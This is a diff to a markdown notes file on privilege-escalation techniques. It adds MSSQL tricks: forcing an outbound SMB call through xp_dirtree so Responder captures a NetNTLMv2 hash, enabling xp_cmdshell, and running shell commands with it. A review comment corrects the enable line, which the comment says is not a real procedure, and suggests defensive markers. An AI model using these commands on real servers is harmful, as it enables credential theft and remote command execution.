... | ... | @@ -8,3 +8,8 @@ A place to keep track of various priv esc techniques used, separated by platform |
|
|
|
|
|
PS Transcripts are very helpful. Search text files for `Windows PowerShell transcript start`
|
|
|
|
|
|
# MSSQL
|
|
|
|
|
|
`EXEC master.sys.xp_dirtree '\\mynetworkpath\folder1\'` creates a network call to a host, responder can collect netntlmv2 hash
|
|
|
`EXEC master.sys.xp_cmdshell_enable; RECONFIGURE` to enable xp_cmdshell
|
|
|
`EXEC master.sys.xp_cmdshell cmd` run shell commands as current system user |
|
|
\ No newline at end of file |
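Review bot: `EXEC master.sys.xp_cmdshell_enable; RECONFIGURE` in this hunk is not a real SQL Server procedure call and will fail; xp_cmdshell is a server configuration option that is toggled through `sp_configure` (which is also the reason a `RECONFIGURE` follows it), and changing it requires ALTER SETTINGS on the instance, i.e. sysadmin or serveradmin, so the line should be corrected and the privilege requirement noted beside it. Two accuracy points in the same hunk: `EXEC master.sys.xp_cmdshell cmd` does not run "as current system user" but under the SQL Server service account (or the configured proxy account when the caller is not sysadmin), which is the detail that determines the impact of this setting; and the xp_dirtree note should state that the NetNTLMv2 hash Responder collects belongs to that same service account, because it is the server process, not the caller, that makes the outbound SMB connection to the UNC path, and xp_dirtree is executable by `public` by default, so this path needs no elevated database rights. It would help readers of this file to add the corresponding defensive markers next to these lines: `sp_configure` changes and xp_cmdshell executions surface in the SQL Server error log and audit, and outbound SMB egress filtering plus SMB signing and a non-privileged service account reduce the value of the xp_dirtree hash-capture path.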